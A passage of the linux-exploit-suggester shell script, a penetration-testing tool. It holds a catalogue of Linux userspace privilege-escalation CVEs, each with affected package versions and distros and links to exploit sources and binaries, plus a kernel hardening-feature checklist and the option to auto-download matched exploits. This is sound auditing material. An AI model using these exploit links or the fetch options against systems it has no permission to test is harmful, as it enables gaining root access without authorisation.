src-url: https://gist.githubusercontent.com/taviso/fe359006836d6cd1091e/raw/32fe8481c434f8cad5bcf8529789231627e5074c/raceabrt.c
exploit-db: 36747
author: Tavis Ormandy
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1318]${txtrst} newpid (apport)
Reqs: pkg=apport,ver>=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern
Tags: ubuntu=14.04
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
exploit-db: 36746
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1318]${txtrst} newpid (apport) 2
Reqs: pkg=apport,ver>=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern
Tags: ubuntu=14.04.2
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
exploit-db: 36782
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3202]${txtrst} fuse (fusermount)
Reqs: pkg=fuse,ver<2.9.3
Tags: debian=7.0|8.0,ubuntu=*
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/520
exploit-db: 37089
Comments: Needs cron or system admin interaction
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1815]${txtrst} setroubleshoot
Reqs: pkg=setroubleshoot,ver<3.2.22
Tags: fedora=21
Rank: 1
exploit-db: 36564
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3246]${txtrst} userhelper
Reqs: pkg=libuser,ver<=0.60
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Rank: 1
analysis-url: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt 
exploit-db: 37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-5287]${txtrst} abrt/sosreport-rhel7
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: RHEL=7{abrt:2.1.11-12.el7}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2015/12/01/1
src-url: https://www.openwall.com/lists/oss-security/2015/12/01/1/1
exploit-db: 38832
author: rebel
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-6565]${txtrst} not_an_sshnuke
Reqs: pkg=openssh-server,ver>=6.8,ver<=6.9
Tags:
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/01/26/2
exploit-db: 41173
author: Federico Bento
Comments: Needs admin interaction (root user needs to login via ssh to trigger exploitation)
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8612]${txtrst} blueman set_dhcp_handler d-bus privesc
Reqs: pkg=blueman,ver<2.0.3
Tags: debian=8{blueman:1.23}
Rank: 1
analysis-url: https://twitter.com/thegrugq/status/677809527882813440
exploit-db: 46186
author: Sebastian Krahmer
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1240]${txtrst} tomcat-rootprivesc-deb.sh
Reqs: pkg=tomcat
Tags: debian=8,ubuntu=16.04
Rank: 1
analysis-url: https://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
src-url: http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh
exploit-db: 40450
author: Dawid Golunski
Comments: Affects only Debian-based distros
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1247]${txtrst} nginxed-root.sh
Reqs: pkg=nginx|nginx-full,ver<1.10.3
Tags: debian=8,ubuntu=14.04|16.04|16.10
Rank: 1
analysis-url: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
src-url: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
exploit-db: 40768
author: Dawid Golunski
Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1531]${txtrst} perl_startup (exim)
Reqs: pkg=exim,ver<4.86.2
Tags: 
Rank: 1
analysis-url: http://www.exim.org/static/doc/CVE-2016-1531.txt
exploit-db: 39549
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1531]${txtrst} perl_startup (exim) 2
Reqs: pkg=exim,ver<4.86.2
Tags: 
Rank: 1
analysis-url: http://www.exim.org/static/doc/CVE-2016-1531.txt
exploit-db: 39535
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4989]${txtrst} setroubleshoot 2
Reqs: pkg=setroubleshoot
Tags: RHEL=6|7
Rank: 1
analysis-url: https://c-skills.blogspot.com/2016/06/lets-feed-attacker-input-to-sh-c-to-see.html
src-url: https://github.com/stealth/troubleshooter/raw/master/straight-shooter.c
exploit-db:
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5425]${txtrst} tomcat-RH-root.sh
Reqs: pkg=tomcat
Tags: RHEL=7
Rank: 1
analysis-url: http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
src-url: http://legalhackers.com/exploits/tomcat-RH-root.sh
exploit-db: 40488
author: Dawid Golunski
Comments: Affects only RedHat-based distros
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-6663,CVE-2016-6664|CVE-2016-6662]${txtrst} mysql-exploit-chain
Reqs: pkg=mysql-server|mariadb-server,ver<5.5.52
Tags: ubuntu=16.04.1
Rank: 1
analysis-url: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
src-url: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
exploit-db: 40678
author: Dawid Golunski
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-9566]${txtrst} nagios-root-privesc
Reqs: pkg=nagios,ver<4.2.4
Tags:
Rank: 1
analysis-url: https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
src-url: https://legalhackers.com/exploits/CVE-2016-9566/nagios-root-privesc.sh
exploit-db: 40921
author: Dawid Golunski
Comments: Allows priv escalation from nagios user or nagios group
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-0358]${txtrst} ntfs-3g-modprobe
Reqs: pkg=ntfs-3g,ver<2017.4
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
exploit-db: 41356
author: Jann Horn
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-5899]${txtrst} s-nail-privget
Reqs: pkg=s-nail,ver<14.8.16
Tags: ubuntu=16.04,manjaro=16.10
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2017/01/27/7
src-url: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
author: wapiflapi (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000367]${txtrst} Sudoer-to-root
Reqs: pkg=sudo,ver<=1.8.20,cmd:[ -f /usr/sbin/getenforce ]
Tags: RHEL=7{sudo:1.8.6p7}
Rank: 1
analysis-url: https://www.sudo.ws/alerts/linux_tty.html
src-url: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
exploit-db: 42183
author: Qualys
Comments: Needs to be sudoer. Works only on SELinux enabled systems
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000367]${txtrst} sudopwn
Reqs: pkg=sudo,ver<=1.8.20,cmd:[ -f /usr/sbin/getenforce ]
Tags:
Rank: 1
analysis-url: https://www.sudo.ws/alerts/linux_tty.html
src-url: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
exploit-db:
author: c0d3z3r0
Comments: Needs to be sudoer. Works only on SELinux enabled systems
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000370]${txtrst} linux_ldso_hwcap
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
exploit-db: 42274
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000371]${txtrst} linux_ldso_dynamic
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
exploit-db: 42276
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000379]${txtrst} linux_ldso_hwcap_64
Reqs: pkg=glibc|libc6,ver<=2.25,x86_64
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
exploit-db: 42275
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000370,CVE-2017-1000371]${txtrst} linux_offset2lib
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
exploit-db: 42273
author: Qualys
Comments: Uses "Stack Clash" technique
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-1000001]${txtrst} RationalLove
Reqs: pkg=glibc|libc6,ver<2.27,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,x86_64
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Rank: 1
analysis-url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
src-url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2018-1000001/RationalLove
exploit-db: 43775
author: halfdog
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-10900]${txtrst} vpnc_privesc.py
Reqs: pkg=networkmanager-vpnc|network-manager-vpnc,ver<1.2.6
Tags: ubuntu=16.04{network-manager-vpnc:1.1.93-1},debian=9.0{network-manager-vpnc:1.2.4-4},manjaro=17
Rank: 1
analysis-url: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
src-url: https://bugzilla.novell.com/attachment.cgi?id=779110
exploit-db: 45313
author: Denis Andzakovic
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-14665]${txtrst} raptor_xorgy
Reqs: pkg=xorg-x11-server-Xorg,cmd:[ -u /usr/bin/Xorg ]
Tags: centos=7.4
Rank: 1
analysis-url: https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
exploit-db: 45922
author: raptor
Comments: X.Org Server before 1.20.3 is vulnerable. Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-7304]${txtrst} dirty_sock
Reqs: pkg=snapd,ver<2.37,cmd:[ -S /run/snapd.socket ]
Tags: ubuntu=18.10,mint=19
Rank: 1
analysis-url: https://initblog.com/2019/dirty-sock/
exploit-db: 46361
exploit-db: 46362
src-url: https://github.com/initstring/dirty_sock/archive/master.zip
author: InitString
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-10149]${txtrst} raptor_exim_wiz
Reqs: pkg=exim|exim4,ver>=4.87,ver<=4.91
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
exploit-db: 46996
author: raptor
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-12181]${txtrst} Serv-U FTP Server
Reqs: cmd:[ -u /usr/local/Serv-U/Serv-U ]
Tags: debian=9
Rank: 1
analysis-url: https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html
exploit-db: 47009
src-url: https://raw.githubusercontent.com/guywhataguy/CVE-2019-12181/master/servu-pe-cve-2019-12181.c
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-12181/SUroot
author: Guy Levin (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
Comments: Modified version at 'ext-url' uses bash exec technique, rather than compiling with gcc.
EOF
)
EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-18862]${txtrst} GNU Mailutils 2.0 <= 3.7 maidag url local root (CVE-2019-18862)
Reqs: cmd:[ -u /usr/local/sbin/maidag ]
Tags: 
Rank: 1
analysis-url: https://www.mike-gualtieri.com/posts/finding-a-decade-old-flaw-in-gnu-mailutils
ext-url: https://github.com/bcoles/local-exploits/raw/master/CVE-2019-18862/exploit.cron.sh
src-url: https://github.com/bcoles/local-exploits/raw/master/CVE-2019-18862/exploit.ldpreload.sh
author: bcoles
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-18634]${txtrst} sudo pwfeedback
Reqs: pkg=sudo,ver<1.8.31
Tags: mint=19
Rank: 1
analysis-url: https://dylankatz.com/Analysis-of-CVE-2019-18634/
src-url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
author: saleemrashid
Comments: sudo configuration requires pwfeedback to be enabled.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2020-9470]${txtrst} Wing FTP Server <= 6.2.5 LPE
Reqs: cmd:[ -x /etc/init.d/wftpserver ]
Tags: ubuntu=18
Rank: 1
analysis-url: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php
src-url: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.sh
exploit-db: 48154
author: Cary Cooper
Comments: Requires an administrator to login via the web interface.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit
Reqs: pkg=sudo,ver<1.9.5p2
Tags: mint=19,ubuntu=18|20, debian=10
Rank: 1
analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
src-url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
author: blasty
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit 2
Reqs: pkg=sudo,ver<1.9.5p2
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Rank: 1
analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
src-url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
author: worawit
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-5618]${txtrst} setuid screen v4.5.0 LPE
Reqs: pkg=screen,ver==4.5.0
Tags: 
Rank: 1
analysis-url: https://seclists.org/oss-sec/2017/q1/184
exploit-db: https://www.exploit-db.com/exploits/41154
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-4034]${txtrst} PwnKit
Reqs: pkg=polkit|policykit-1,ver<=0.105-31
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Rank: 1
analysis-url: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
src-url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
author: berdav
EOF
)

###########################################################
## security related HW/kernel features
###########################################################
n=0

FEATURES[((n++))]=$(cat <<EOF
section: Mainline kernel protection mechanisms:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Kernel Page Table Isolation (PTI) support
available: ver>=4.15
enabled: cmd:grep -Eqi '\spti' /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/pti.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: GCC stack protector support
available: CONFIG_HAVE_STACKPROTECTOR=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-regular.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: GCC stack protector STRONG support
available: CONFIG_STACKPROTECTOR_STRONG=y,ver>=3.14
analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Low address space to protect from user allocation
available: CONFIG_DEFAULT_MMAP_MIN_ADDR=[0-9]+
enabled: sysctl:vm.mmap_min_addr!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/mmap_min_addr.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Prevent users from using ptrace to examine the memory and state of their processes
available: CONFIG_SECURITY_YAMA=y
enabled: sysctl:kernel.yama.ptrace_scope!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/yama_ptrace_scope.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict unprivileged access to kernel syslog
available: CONFIG_SECURITY_DMESG_RESTRICT=y,ver>=2.6.37
enabled: sysctl:kernel.dmesg_restrict!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Randomize the address of the kernel image (KASLR)
available: CONFIG_RANDOMIZE_BASE=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/kaslr.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Hardened user copy support
available: CONFIG_HARDENED_USERCOPY=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/hardened_usercopy.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Make kernel text and rodata read-only
available: CONFIG_STRICT_KERNEL_RWX=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_kernel_rwx.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Set loadable kernel module data as NX and text as RO
available: CONFIG_STRICT_MODULE_RWX=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_module_rwx.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: BUG() conditions reporting
available: CONFIG_BUG=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bug.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Additional 'cred' struct checks
available: CONFIG_DEBUG_CREDENTIALS=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_credentials.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Sanity checks for notifier call chains
available: CONFIG_DEBUG_NOTIFIERS=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_notifiers.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Extended checks for linked-lists walking
available: CONFIG_DEBUG_LIST=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_list.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks on scatter-gather tables
available: CONFIG_DEBUG_SG=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_sg.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks for data structure corruptions
available: CONFIG_BUG_ON_DATA_CORRUPTION=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bug_on_data_corruption.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks for a stack overrun on calls to 'schedule'
available: CONFIG_SCHED_STACK_END_CHECK=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/sched_stack_end_check.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Freelist order randomization on new pages creation
available: CONFIG_SLAB_FREELIST_RANDOM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slab_freelist_random.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Freelist metadata hardening
available: CONFIG_SLAB_FREELIST_HARDENED=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slab_freelist_hardened.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Allocator validation checking
available: CONFIG_SLUB_DEBUG_ON=y,cmd:! grep 'slub_debug=-' /proc/cmdline
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slub_debug.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Virtually-mapped kernel stacks with guard pages
available: CONFIG_VMAP_STACK=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/vmap_stack.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Pages poisoning after free_pages() call
available: CONFIG_PAGE_POISONING=y
enabled: cmd: grep 'page_poison=1' /proc/cmdline
analysis-url: https://github.com/mzet-/les-res/blob/master/features/page_poisoning.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Using 'refcount_t' instead of 'atomic_t'
available: CONFIG_REFCOUNT_FULL=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/refcount_full.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Hardening common str/mem functions against buffer overflows
available: CONFIG_FORTIFY_SOURCE=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/fortify_source.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict /dev/mem access
available: CONFIG_STRICT_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict I/O access to /dev/mem
available: CONFIG_IO_STRICT_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/io_strict_devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: Hardware-based protection features:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Supervisor Mode Execution Protection (SMEP) support
available: ver>=3.0
enabled: cmd:grep -qi smep /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/smep.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Supervisor Mode Access Prevention (SMAP) support
available: ver>=3.7
enabled: cmd:grep -qi smap /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/smap.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: 3rd party kernel protection mechanisms:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Grsecurity
available: CONFIG_GRKERNSEC=y
enabled: cmd:test -c /dev/grsec
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: PaX
available: CONFIG_PAX=y
enabled: cmd:test -x /sbin/paxctl
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Linux Kernel Runtime Guard (LKRG) kernel module
enabled: cmd:test -d /proc/sys/lkrg
analysis-url: https://github.com/mzet-/les-res/blob/master/features/lkrg.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: Attack Surface:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: User namespaces for unprivileged accounts
available: CONFIG_USER_NS=y
enabled: sysctl:kernel.unprivileged_userns_clone==1
analysis-url: https://github.com/mzet-/les-res/blob/master/features/user_ns.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Unprivileged access to bpf() system call
available: CONFIG_BPF_SYSCALL=y
enabled: sysctl:kernel.unprivileged_bpf_disabled!=1
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Syscalls filtering
available: CONFIG_SECCOMP=y
enabled: cmd:grep -iw Seccomp /proc/self/status | awk '{print \$2}'
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Support for /dev/mem access
available: CONFIG_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Support for /dev/kmem access
available: CONFIG_DEVKMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/devkmem.md
EOF
)


version() {
    echo "linux-exploit-suggester "$VERSION", mzet, https://z-labs.eu, March 2019"
}

usage() {
    echo "LES ver. $VERSION (https://github.com/mzet-/linux-exploit-suggester) by @_mzet_"
    echo
    echo "Usage: linux-exploit-suggester.sh [OPTIONS]"
    echo
    echo " -V | --version               - print version of this script"
    echo " -h | --help                  - print this help"
    echo " -k | --kernel <version>      - provide kernel version"
    echo " -u | --uname <string>        - provide 'uname -a' string"
    echo " --skip-more-checks           - do not perform additional checks (kernel config, sysctl) to determine if exploit is applicable"
    echo " --skip-pkg-versions          - skip checking for exact userspace package version (helps to avoid false negatives)"
    echo " -p | --pkglist-file <file>   - provide file with 'dpkg -l' or 'rpm -qa' command output"
    echo " --cvelist-file <file>        - provide file with Linux kernel CVEs list"
    echo " --checksec                   - list security related features for your HW/kernel"
    echo " -s | --fetch-sources         - automatically downloads source for matched exploit"
    echo " -b | --fetch-binaries        - automatically downloads binary for matched exploit if available"
    echo " -f | --full                  - show full info about matched exploit"
    echo " -g | --short                 - show shorten info about matched exploit"
    echo " --kernelspace-only           - show only kernel vulnerabilities"
    echo " --userspace-only             - show only userspace vulnerabilities"
    echo " -d | --show-dos              - show also DoSes in results"
}

exitWithErrMsg() {
    echo "$1" 1>&2
    exit 1
}

# extracts all information from output of 'uname -a' command
parseUname() {
    local uname=$1

    KERNEL=$(echo "$uname" | awk '{print $3}' | cut -d '-' -f 1)
    KERNEL_ALL=$(echo "$uname" | awk '{print $3}')
    ARCH=$(echo "$uname" | awk '{print $(NF-1)}')

    OS=""
    echo "$uname" | grep -q -i 'deb' && OS="debian"
    echo "$uname" | grep -q -i 'ubuntu' && OS="ubuntu"
    echo "$uname" | grep -q -i '\-ARCH' && OS="arch"
    echo "$uname" | grep -q -i '\-deepin' && OS="deepin"
    echo "$uname" | grep -q -i '\-MANJARO' && OS="manjaro"
    echo "$uname" | grep -q -i '\.fc' && OS="fedora"
    echo "$uname" | grep -q -i '\.el' && OS="RHEL"
    echo "$uname" | grep -q -i '\.mga' && OS="mageia"

    # 'uname -a' output doesn't contain distribution number (at least not in case of all distros)
}

getPkgList() {
    local distro=$1
    local pkglist_file=$2
    
    # take package listing from provided file & detect if it's 'rpm -qa' listing or 'dpkg -l' or 'pacman -Q' listing of not recognized listing
    if [ "$opt_pkglist_file" = "true" -a -e "$pkglist_file" ]; then

        # ubuntu/debian package listing file
        if [ $(head -1 "$pkglist_file" | grep 'Desired=Unknown/Install/Remove/Purge/Hold') ]; then
            PKG_LIST=$(cat "$pkglist_file" | awk '{print $2"-"$3}' | sed 's/:amd64//g')

            OS="debian"
            [ "$(grep ubuntu "$pkglist_file")" ] && OS="ubuntu"
        # redhat package listing file
